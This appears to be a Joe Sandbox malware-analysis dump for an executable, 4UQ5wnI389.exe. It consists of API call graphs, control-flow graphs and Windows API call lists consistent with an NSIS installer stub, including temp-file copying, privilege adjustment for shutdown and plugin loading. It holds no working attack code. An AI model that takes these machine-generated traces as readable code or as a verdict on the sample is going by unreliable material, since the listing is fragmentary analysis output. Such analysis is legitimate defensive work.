GetFileAttributesW CreateFileW 4646->4757 4648 402f73 4675 402f80 4648->4675 4758 4063e8 lstrcpynW 4648->4758 4650 402f96 4651 405d09 2 API calls 4650->4651 4652 402f9c 4651->4652 4759 4063e8 lstrcpynW 4652->4759 4654 402fa7 GetFileSize 4655 4030a8 4654->4655 4659 402fbe 4654->4659 4656 402e8e 32 API calls 4655->4656 4657 4030af 4656->4657 4660 4030eb GlobalAlloc 4657->4660 4657->4675 4761 40345d SetFilePointer 4657->4761 4658 403447 ReadFile 4658->4659 4659->4655 4659->4658 4661 403143 4659->4661 4667 402e8e 32 API calls 4659->4667 4659->4675 4664 403102 4660->4664 4662 402e8e 32 API calls 4661->4662 4662->4675 4668 405f0d 2 API calls 4664->4668 4665 4030cc 4666 403447 ReadFile 4665->4666 4669 4030d7 4666->4669 4667->4659 4670 403113 CreateFileW 4668->4670 4669->4660 4669->4675 4671 40314d 4670->4671 4670->4675 4760 40345d SetFilePointer 4671->4760 4673 40315b 4674 4031d6 44 API calls 4673->4674 4674->4675 4675->4573 4675->4675 4677 4067c2 5 API calls 4676->4677 4678 403aec 4677->4678 4679 403af2 4678->4679 4680 403b04 4678->4680 4770 40632f wsprintfW 4679->4770 4681 4062b6 3 API calls 4680->4681 4682 403b34 4681->4682 4683 403b53 lstrcatW 4682->4683 4685 4062b6 3 API calls 4682->4685 4686 403b02 4683->4686 4685->4683 4762 403dae 4686->4762 4689 405dc5 18 API calls 4691 403b85 4689->4691 4690 403c19 4692 405dc5 18 API calls 4690->4692 4691->4690 4693 4062b6 3 API calls 4691->4693 4694 403c1f 4692->4694 4695 403bb7 4693->4695 4696 403c2f LoadImageW 4694->4696 4699 40640a 17 API calls 4694->4699 4695->4690 4702 403bd8 lstrlenW 4695->4702 4706 405cea CharNextW 4695->4706 4697 403cd5 4696->4697 4698 403c56 RegisterClassW 4696->4698 4701 40140b 2 API calls 4697->4701 4700 403c8c SystemParametersInfoW CreateWindowExW 4698->4700 4731 403cdf 4698->4731 4699->4696 4700->4697 4705 403cdb 4701->4705 4703 403be6 lstrcmpiW 4702->4703 4704 403c0c 4702->4704 4703->4704 4707 403bf6 GetFileAttributesW 4703->4707 4708 405cbd 3 API calls 4704->4708 4711 403dae 18 API calls 4705->4711 4705->4731 4709 403bd5 4706->4709 4710 403c02 4707->4710 4712 403c12 4708->4712 4709->4702 4710->4704 4713 405d09 2 API calls 4710->4713 4714 403cec 4711->4714 4771 4063e8 lstrcpynW 4712->4771 4713->4704 4716 403cf8 ShowWindow 4714->4716 4717 403d7b 4714->4717 4719 406752 3 API calls 4716->4719 4772 405523 OleInitialize 4717->4772 4721 403d10 4719->4721 4720 403d81 4722 403d85 4720->4722 4723 403d9d 4720->4723 4724 403d1e GetClassInfoW 4721->4724 4726 406752 3 API calls 4721->4726 4730 40140b 2 API calls 4722->4730 4722->4731 4725 40140b 2 API calls 4723->4725 4727 403d32 GetClassInfoW RegisterClassW 4724->4727 4728 403d48 DialogBoxParamW 4724->4728 4725->4731 4726->4724 4727->4728 4729 40140b 2 API calls 4728->4729 4729->4731 4730->4731 4731->4629 4732->4578 4733->4610 4734->4579 4736 403a01 4735->4736 4737 4039f7 CloseHandle 4735->4737 4738 403a15 4736->4738 4739 403a0b CloseHandle 4736->4739 4737->4736 4783 403a43 4738->4783 4739->4738 4742 405afa 67 API calls 4743 403819 OleUninitialize 4742->4743 4743->4586 4743->4587 4745 405a63 4744->4745 4746 403838 ExitProcess 4745->4746 4747 405a77 MessageBoxIndirectW 4745->4747 4747->4746 4748->4619 4749->4631 4751 405a10 4750->4751 4752 405a04 CloseHandle 4750->4752 4751->4631 4752->4751 4754 405f1a GetTickCount GetTempFileNameW 4753->4754 4755 405f50 4754->4755 4756 4034a3 4754->4756 4755->4754 4755->4756 4756->4566 4757->4648 4758->4650 4759->4654 4760->4673 4761->4665 4763 403dc2 4762->4763 4779 40632f wsprintfW 4763->4779 4765 403e33 4780 403e67 4765->4780 4767 403b63 4767->4689 4768 403e38 4768->4767 4769 40640a 17 API calls 4768->4769 4769->4768 4770->4686 4771->4690 4773 4043ab SendMessageW 4772->4773 4774 405546 4773->4774 4777 401389 2 API calls 4774->4777 4778 40556d 4774->4778 4775 4043ab SendMessageW 4776 40557f OleUninitialize 4775->4776 4776->4720 4777->4774 4778->4775 4779->4765 4781 40640a 17 API calls 4780->4781 4782 403e75 SetWindowTextW 4781->4782 4782->4768 4784 403a51 4783->4784 4785 403a1a 4784->4785 4786 403a56 FreeLibrary GlobalFree 4784->4786 4785->4742 4786->4785 4786->4786 5887 404ba6 5888 404bd2 5887->5888 5889 404bb6 5887->5889 5890 404c05 5888->5890 5891 404bd8 SHGetPathFromIDListW 5888->5891 5898 405a32 GetDlgItemTextW 5889->5898 5893 404bef SendMessageW 5891->5893 5894 404be8 5891->5894 5893->5890 5896 40140b 2 API calls 5894->5896 5895 404bc3 SendMessageW 5895->5888 5896->5893 5898->5895 5913 4029a8 5914 402c1f 17 API calls 5913->5914 5915 4029ae 5914->5915 5916 4029d5 5915->5916 5917 4029ee 5915->5917 5922 40288b 5915->5922 5920 4029da 5916->5920 5926 4029eb 5916->5926 5918 402a08 5917->5918 5919 4029f8 5917->5919 5923 40640a 17 API calls 5918->5923 5921 402c1f 17 API calls 5919->5921 5927 4063e8 lstrcpynW 5920->5927 5921->5926 5923->5926 5926->5922 5928 40632f wsprintfW 5926->5928 5927->5922 5928->5922 5929 701422fd 5930 70142367 5929->5930 5931 70142372 GlobalAlloc 5930->5931 5932 70142391 5930->5932 5931->5930 5933 4028ad 5934 402c41 17 API calls 5933->5934 5936 4028bb 5934->5936 5935 4028d1 5938 405eb9 2 API calls 5935->5938 5936->5935 5937 402c41 17 API calls 5936->5937 5937->5935 5939 4028d7 5938->5939 5961 405ede GetFileAttributesW CreateFileW 5939->5961 5941 4028e4 5942 4028f0 GlobalAlloc 5941->5942 5943 402987 5941->5943 5944 402909 5942->5944 5945 40297e CloseHandle 5942->5945 5946 4029a2 5943->5946 5947 40298f DeleteFileW 5943->5947 5962 40345d SetFilePointer 5944->5962 5945->5943 5947->5946 5949 40290f 5950 403447 ReadFile 5949->5950 5951 402918 GlobalAlloc 5950->5951 5952 402928 5951->5952 5953 40295c 5951->5953 5955 4031d6 44 API calls 5952->5955 5954 405f90 WriteFile 5953->5954 5956 402968 GlobalFree 5954->5956 5960 402935 5955->5960 5957 4031d6 44 API calls 5956->5957 5959 40297b 5957->5959 5958 402953 GlobalFree 5958->5953 5959->5945 5960->5958 5961->5941 5962->5949 5970 401a30 5971 402c41 17 API calls 5970->5971 5972 401a39 ExpandEnvironmentStringsW 5971->5972 5973 401a60 5972->5973 5974 401a4d 5972->5974 5974->5973 5975 401a52 lstrcmpW 5974->5975 5975->5973 5066 402032 5067 402044 5066->5067 5068 4020f6 5066->5068 5069 402c41 17 API calls 5067->5069 5071 401423 24 API calls 5068->5071 5070 40204b 5069->5070 5072 402c41 17 API calls 5070->5072 5076 402250 5071->5076 5073 402054 5072->5073 5074 40206a LoadLibraryExW 5073->5074 5075 40205c GetModuleHandleW 5073->5075 5074->5068 5077 40207b 5074->5077 5075->5074 5075->5077 5089 406831 WideCharToMultiByte 5077->5089 5080 4020c5 5082 405450 24 API calls 5080->5082 5081 40208c 5083 402094 5081->5083 5084 4020ab 5081->5084 5086 40209c 5082->5086 5085 401423 24 API calls 5083->5085 5092 70141777 5084->5092 5085->5086 5086->5076 5087 4020e8 FreeLibrary 5086->5087 5087->5076 5090 40685b GetProcAddress 5089->5090 5091 402086 5089->5091 5090->5091 5091->5080 5091->5081 5093 701417aa 5092->5093 5134 70141b5f 5093->5134 5095 701417b1 5096 701418d6 5095->5096 5097 701417c2 5095->5097 5098 701417c9 5095->5098 5096->5086 5184 70142352 5097->5184 5168 70142394 5098->5168 5103 7014182d 5108 70141833 5103->5108 5109 7014187e 5103->5109 5104 7014180f 5197 70142569 5104->5197 5105 701417df 5113 701417e5 5105->5113 5114 701417f0 5105->5114 5106 701417f8 5118 701417ee 5106->5118 5194 70142d37 5106->5194 5216 701415c6 5108->5216 5111 70142569 10 API calls 5109->5111 5119 7014186f 5111->5119 5112 70141815 5208 701415b4 5112->5208 5113->5118 5178 70142aac 5113->5178 5188 70142724 5114->5188 5118->5103 5118->5104 5125 701418c5 5119->5125 5222 7014252c 5119->5222 5122 70142569 10 API calls 5122->5119 5124 701417f6 5124->5118 5125->5096 5127 701418cf GlobalFree 5125->5127 5127->5096 5131 701418b1 5131->5125 5226 7014153d wsprintfW 5131->5226 5132 701418aa FreeLibrary 5132->5131 5229 7014121b GlobalAlloc 5134->5229 5136 70141b83 5230 7014121b GlobalAlloc 5136->5230 5138 70141da9 GlobalFree GlobalFree GlobalFree 5139 70141dc6 5138->5139 5154 70141e10 5138->5154 5141 70142192 5139->5141 5149 70141ddb 5139->5149 5139->5154 5140 70141c64 GlobalAlloc 5163 70141b8e 5140->5163 5142 701421b4 GetModuleHandleW 5141->5142 5141->5154 5145 701421c5 LoadLibraryW 5142->5145 5146 701421da 5142->5146 5143 70141caf lstrcpyW 5148 70141cb9 lstrcpyW 5143->5148 5144 70141ccd GlobalFree 5144->5163 5145->5146 5145->5154 5237 7014161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5146->5237 5148->5163 5149->5154 5233 7014122c 5149->5233 5150 7014222c 5152 70142239 lstrlenW 5150->5152 5150->5154 5238 7014161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5152->5238 5153 70142064 5236 7014121b GlobalAlloc 5153->5236 5154->5095 5155 701421ec 5155->5150 5166 70142216 GetProcAddress 5155->5166 5156 701420ec 5156->5154 5161 70142134 lstrcpyW 5156->5161 5159 70141d0b 5159->5163 5231 7014158f GlobalSize GlobalAlloc 5159->5231 5160 70141fa5 GlobalFree 5160->5163 5161->5154 5162 70142253 5162->5154 5163->5138 5163->5140 5163->5143 5163->5144 5163->5148 5163->5153 5163->5154 5163->5156 5163->5159 5163->5160 5165 7014122c 2 API calls 5163->5165 5165->5163 5166->5150 5167 7014206d 5167->5095 5170 701423ac 5168->5170 5169 7014122c GlobalAlloc lstrcpynW 5169->5170 5170->5169 5172 701424d5 GlobalFree 5170->5172 5173 70142454 GlobalAlloc WideCharToMultiByte 5170->5173 5174 7014247f GlobalAlloc CLSIDFromString 5170->5174 5177 7014249e 5170->5177 5240 701412ba 5170->5240 5172->5170 5175 701417cf 5172->5175 5173->5172 5174->5172 5175->5105 5175->5106 5175->5118 5177->5172 5244 701426b8 5177->5244 5180 70142abe 5178->5180 5179 70142b63 EnumWindows 5181 70142b81 5179->5181 5180->5179 5247 70142a56 5181->5247 5183 70142c4d 5183->5118 5185 70142367 5184->5185 5186 70142372 GlobalAlloc 5185->5186 5187 701417c8 5185->5187 5186->5185 5187->5098 5192 70142754 5188->5192 5189 70142802 5191 70142808 GlobalSize 5189->5191 5193 70142812 5189->5193 5190 701427ef GlobalAlloc 5190->5193 5191->5193 5192->5189 5192->5190 5193->5124 5195 70142d42 5194->5195 5196 70142d82 GlobalFree 5195->5196 5251 7014121b GlobalAlloc 5197->5251 5199 701425ec MultiByteToWideChar 5202 70142573 5199->5202 5200 7014260e StringFromGUID2 5200->5202 5201 7014261f lstrcpynW 5201->5202 5202->5199 5202->5200 5202->5201 5203 70142632 wsprintfW 5202->5203 5204 70142656 GlobalFree 5202->5204 5205 7014268b GlobalFree 5202->5205 5206 70141272 2 API calls 5202->5206 5252 701412e1 5202->5252 5203->5202 5204->5202 5205->5112 5206->5202 5256 7014121b GlobalAlloc 5208->5256 5210 701415b9 5211 701415c6 2 API calls 5210->5211 5212 701415c3 5211->5212 5213 70141272 5212->5213 5214 701412b5 GlobalFree 5213->5214 5215 7014127b GlobalAlloc lstrcpynW 5213->5215 5214->5119 5215->5214 5217 701415d2 wsprintfW 5216->5217 5218 701415ff lstrcpyW 5216->5218 5221 70141618 5217->5221 5218->5221 5221->5122 5223 7014253a 5222->5223 5225 70141891 5222->5225 5224 70142556 GlobalFree 5223->5224 5223->5225 5224->5223 5225->5131 5225->5132 5227 70141272 2 API calls 5226->5227 5228 7014155e 5227->5228 5228->5125 5229->5136 5230->5163 5232 701415ad 5231->5232 5232->5159 5239 7014121b GlobalAlloc 5233->5239 5235 7014123b lstrcpynW 5235->5154 5236->5167 5237->5155 5238->5162 5239->5235 5241 701412c1 5240->5241 5242 7014122c 2 API calls 5241->5242 5243 701412df 5242->5243 5243->5170 5245 701426c6 VirtualAlloc 5244->5245 5246 7014271c 5244->5246 5245->5246 5246->5177 5248 70142a61 5247->5248 5249 70142a66 GetLastError 5248->5249 5250 70142a71 5248->5250 5249->5250 5250->5183 5251->5202 5253 7014130c 5252->5253 5254 701412ea 5252->5254 5253->5202 5254->5253 5255 701412f0 lstrcpyW 5254->5255 5255->5253 5256->5210 5981 402a35 5982 402c1f 17 API calls 5981->5982 5983 402a3b 5982->5983 5984 402a72 5983->5984 5986 40288b 5983->5986 5987 402a4d 5983->5987 5985 40640a 17 API calls 5984->5985 5984->5986 5985->5986 5987->5986 5989 40632f wsprintfW 5987->5989 5989->5986 5990 401735 5991 402c41 17 API calls 5990->5991 5992 40173c SearchPathW 5991->5992 5993 401757 5992->5993 5994 4029e6 5992->5994 5993->5994 5996 4063e8 lstrcpynW 5993->5996 5996->5994 5997 701410e1 6001 70141111 5997->6001 5998 701411d8 GlobalFree 5999 701412ba 2 API calls 5999->6001 6000 701411d3 6000->5998 6001->5998 6001->5999 6001->6000 6002 70141164 GlobalAlloc 6001->6002 6003 701411f8 GlobalFree 6001->6003 6004 70141272 2 API calls 6001->6004 6005 701411c4 GlobalFree 6001->6005 6006 701412e1 lstrcpyW 6001->6006 6002->6001 6003->6001 6004->6005 6005->6001 6006->6001 6007 4014b8 6008 4014be 6007->6008 6009 401389 2 API calls 6008->6009 6010 4014c6 6009->6010 6011 7014166d 6012 70141516 GlobalFree 6011->6012 6015 70141685 6012->6015 6013 701416cb GlobalFree 6014 701416a0 6014->6013 6015->6013 6015->6014 6016 701416b7 VirtualFree 6015->6016 6016->6013 6017 401db9 GetDC 6018 402c1f 17 API calls 6017->6018 6019 401dcb GetDeviceCaps MulDiv ReleaseDC 6018->6019 6020 402c1f 17 API calls 6019->6020 6021 401dfc 6020->6021 6022 40640a 17 API calls 6021->6022 6023 401e39 CreateFontIndirectW 6022->6023 6024 402592 6023->6024 6025 40283b 6026 402843 6025->6026 6027 402847 FindNextFileW 6026->6027 6029 402859 6026->6029 6027->6029 6028 4029e6 6029->6028 6031 4063e8 lstrcpynW 6029->6031 6031->6028

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 0 4034a5-4034e2 SetErrorMode GetVersion 1 4034e4-4034ec call 4067c2 0->1 2 4034f5 0->2 1->2 7 4034ee 1->7 4 4034fa-40350e call 406752 lstrlenA 2->4 9 403510-40352c call 4067c2 * 3 4->9 7->2 16 40353d-40359c #17 OleInitialize SHGetFileInfoW call 4063e8 GetCommandLineW call 4063e8 9->16 17 40352e-403534 9->17 24 4035a6-4035c0 call 405cea CharNextW 16->24 25 40359e-4035a5 16->25 17->16 21 403536 17->21 21->16 28 4035c6-4035cc 24->28 29 4036d7-4036f1 GetTempPathW call 403474 24->29 25->24 30 4035d5-4035d9 28->30 31 4035ce-4035d3 28->31 38 4036f3-403711 GetWindowsDirectoryW lstrcatW call 403474 29->38 39 403749-403763 DeleteFileW call 402f30 29->39 33 4035e0-4035e4 30->33 34 4035db-4035df 30->34 31->30 31->31 36 4036a3-4036b0 call 405cea 33->36 37 4035ea-4035f0 33->37 34->33 54 4036b2-4036b3 36->54 55 4036b4-4036ba 36->55 42 4035f2-4035fa 37->42 43 40360b-403644 37->43 38->39 53 403713-403743 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403474 38->53 56 403814-403824 call 4039e6 OleUninitialize 39->56 57 403769-40376f 39->57 47 403601 42->47 48 4035fc-4035ff 42->48 49 403661-40369b 43->49 50 403646-40364b 43->50 47->43 48->43 48->47 49->36 52 40369d-4036a1 49->52 50->49 58 40364d-403655 50->58 52->36 59 4036c2-4036d0 call 4063e8 52->59 53->39 53->56 54->55 55->28 61 4036c0 55->61 75 40394a-403950 56->75 76 40382a-40383a call 405a4e ExitProcess 56->76 62 403804-40380b call 403ad8 57->62 63 403775-403780 call 405cea 57->63 65 403657-40365a 58->65 66 40365c 58->66 68 4036d5 59->68 61->68 74 403810 62->74 79 403782-4037b7 63->79 80 4037ce-4037d8 63->80 65->49 65->66 66->49 68->29 74->56 77 403952-403968 GetCurrentProcess OpenProcessToken 75->77 78 4039ce-4039d6 75->78 85 40396a-403998 LookupPrivilegeValueW AdjustTokenPrivileges 77->85 86 40399e-4039ac call 4067c2 77->86 88 4039d8 78->88 89 4039dc-4039e0 ExitProcess 78->89 87 4037b9-4037bd 79->87 82 403840-403854 call 4059b9 lstrcatW 80->82 83 4037da-4037e8 call 405dc5 80->83 100 403861-40387b lstrcatW lstrcmpiW 82->100 101 403856-40385c lstrcatW 82->101 83->56 99 4037ea-403800 call 4063e8 * 2 83->99 85->86 102 4039ba-4039c5 ExitWindowsEx 86->102 103 4039ae-4039b8 86->103 93 4037c6-4037ca 87->93 94 4037bf-4037c4 87->94 88->89 93->87 98 4037cc 93->98 94->93 94->98 98->80 99->62 100->56 105 40387d-403880 100->105 101->100 102->78 106 4039c7-4039c9 call 40140b 102->106 103->102 103->106 108 403882-403887 call 40591f 105->108 109 403889 call 40599c 105->109 106->78 117 40388e-40389c SetCurrentDirectoryW 108->117 109->117 118 4038a9-4038d2 call 4063e8 117->118 119 40389e-4038a4 call 4063e8 117->119 123 4038d7-4038f3 call 40640a DeleteFileW 118->123 119->118 126 403934-40393c 123->126 127 4038f5-403905 CopyFileW 123->127 126->123 129 40393e-403945 call 4061ae 126->129 127->126 128 403907-403927 call 4061ae call 40640a call 4059d1 127->128 128->126 138 403929-403930 CloseHandle 128->138 129->56 138->126
                                                                                                            APIs
                                                                                                            • SetErrorMode.KERNELBASE ref: 004034C8
                                                                                                            • GetVersion.KERNEL32 ref: 004034CE
                                                                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403501
                                                                                                            • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040353E
                                                                                                            • OleInitialize.OLE32(00000000), ref: 00403545
                                                                                                            • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403561
                                                                                                            • GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 00403576
                                                                                                            • CharNextW.USER32(00000000,00435000,00000020,00435000,00000000,?,00000006,00000008,0000000A), ref: 004035AE
                                                                                                              • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                              • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                            • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004036E8
                                                                                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004036F9
                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403705
                                                                                                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403719
                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403721
                                                                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403732
                                                                                                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040373A
                                                                                                            • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 0040374E
                                                                                                              • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                            • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403819
                                                                                                            • ExitProcess.KERNEL32 ref: 0040383A
                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040384D
                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040385C
                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403867
                                                                                                            • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00436800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403873
                                                                                                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040388F
                                                                                                            • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 004038E9
                                                                                                            • CopyFileW.KERNEL32(C:\Users\user\Desktop\4UQ5wnI389.exe,00420EE8,00000001,?,00000006,00000008,0000000A), ref: 004038FD
                                                                                                            • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,00000008,0000000A), ref: 0040392A
                                                                                                            • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403959
                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00403960
                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
                                                                                                            • AdjustTokenPrivileges.ADVAPI32 ref: 00403998
                                                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
                                                                                                            • ExitProcess.KERNEL32 ref: 004039E0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                            • String ID: .tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\4UQ5wnI389.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                            • API String ID: 3441113951-3090522732
                                                                                                            • Opcode ID: e11a689ec9d555b5fe2f652178506891ef29a00bc77516d82e2752c077597b55
                                                                                                            • Instruction ID: dafc1af32610b20ef8647c0cf6a3faef20d76686829591872cbc6ab955e55f97
                                                                                                            • Opcode Fuzzy Hash: e11a689ec9d555b5fe2f652178506891ef29a00bc77516d82e2752c077597b55
                                                                                                            • Instruction Fuzzy Hash: 4DD1F571600310ABE7206F759D49A3B3AECEB4070AF50443FF981B62D2DB7D8956876E

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 139 404dcc-404e18 GetDlgItem * 2 140 405039-405040 139->140 141 404e1e-404eb2 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 139->141 142 405042-405052 140->142 143 405054 140->143 144 404ec1-404ec8 DeleteObject 141->144 145 404eb4-404ebf SendMessageW 141->145 146 405057-405060 142->146 143->146 147 404eca-404ed2 144->147 145->144 148 405062-405065 146->148 149 40506b-405071 146->149 150 404ed4-404ed7 147->150 151 404efb-404eff 147->151 148->149 153 40514f-405156 148->153 156 405080-405087 149->156 157 405073-40507a 149->157 154 404ed9 150->154 155 404edc-404ef9 call 40640a SendMessageW * 2 150->155 151->147 152 404f01-404f2d call 40435f * 2 151->152 195 404f33-404f39 152->195 196 404ff8-40500b GetWindowLongW SetWindowLongW 152->196 161 4051c7-4051cf 153->161 162 405158-40515e 153->162 154->155 155->151 158 405089-40508c 156->158 159 4050fc-4050ff 156->159 157->153 157->156 167 405097-4050ac call 404d1a 158->167 168 40508e-405095 158->168 159->153 172 405101-40510b 159->172 164 4051d1-4051d7 SendMessageW 161->164 165 4051d9-4051e0 161->165 170 405164-40516e 162->170 171 4053af-4053c1 call 4043c6 162->171 164->165 175 4051e2-4051e9 165->175 176 405214-40521b 165->176 167->159 194 4050ae-4050bf 167->194 168->159 168->167 170->171 179 405174-405183 SendMessageW 170->179 173 40511b-405125 172->173 174 40510d-405119 SendMessageW 172->174 173->153 182 405127-405131 173->182 174->173 183 4051f2-4051f9 175->183 184 4051eb-4051ec ImageList_Destroy 175->184 187 405371-405378 176->187 188 405221-40522d call 4011ef 176->188 179->171 189 405189-40519a SendMessageW 179->189 190 405142-40514c 182->190 191 405133-405140 182->191 192 405202-40520e 183->192 193 4051fb-4051fc GlobalFree 183->193 184->183 187->171 200 40537a-405381 187->200 213 40523d-405240 188->213 214 40522f-405232 188->214 198 4051a4-4051a6 189->198 199 40519c-4051a2 189->199 190->153 191->153 192->176 193->192 194->159 202 4050c1-4050c3 194->202 203 404f3c-404f43 195->203 201 405011-405015 196->201 205 4051a7-4051c0 call 401299 SendMessageW 198->205 199->198 199->205 200->171 206 405383-4053ad ShowWindow GetDlgItem ShowWindow 200->206 207 405017-40502a ShowWindow call 404394 201->207 208 40502f-405037 call 404394 201->208 209 4050c5-4050cc 202->209 210 4050d6 202->210 211 404fd9-404fec 203->211 212 404f49-404f71 203->212 205->161 206->171 207->171 208->140 220 4050d2-4050d4 209->220 221 4050ce-4050d0 209->221 224 4050d9-4050f5 call 40117d 210->224 211->203 228 404ff2-404ff6 211->228 222 404f73-404fa9 SendMessageW 212->222 223 404fab-404fad 212->223 216 405281-4052a5 call 4011ef 213->216 217 405242-40525b call 4012e2 call 401299 213->217 225 405234 214->225 226 405235-405238 call 404d9a 214->226 241 405347-40535b InvalidateRect 216->241 242 4052ab 216->242 246 40526b-40527a SendMessageW 217->246 247 40525d-405263 217->247 220->224 221->224 222->211 233 404fc0-404fd6 SendMessageW 223->233 234 404faf-404fbe SendMessageW 223->234 224->159 225->226 226->213 228->196 228->201 233->211 234->211 241->187 244 40535d-40536c call 404ced call 404cd5 241->244 245 4052ae-4052b9 242->245 244->187 248 4052bb-4052ca 245->248 249 40532f-405341 245->249 246->216 251 405265 247->251 252 405266-405269 247->252 254 4052cc-4052d9 248->254 255 4052dd-4052e0 248->255 249->241 249->245 251->252 252->246 252->247 254->255 256 4052e2-4052e5 255->256 257 4052e7-4052f0 255->257 259 4052f5-40532d SendMessageW * 2 256->259 257->259 260 4052f2 257->260 259->249 260->259
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,000003F9), ref: 00404DE4
                                                                                                            • GetDlgItem.USER32(?,00000408), ref: 00404DEF
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404E39
                                                                                                            • LoadBitmapW.USER32(0000006E), ref: 00404E4C
                                                                                                            • SetWindowLongW.USER32(?,000000FC,004053C4), ref: 00404E65
                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E79
                                                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E8B
                                                                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404EA1
                                                                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EAD
                                                                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404EBF
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00404EC2
                                                                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EED
                                                                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EF9
                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F8F
                                                                                                            • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404FBA
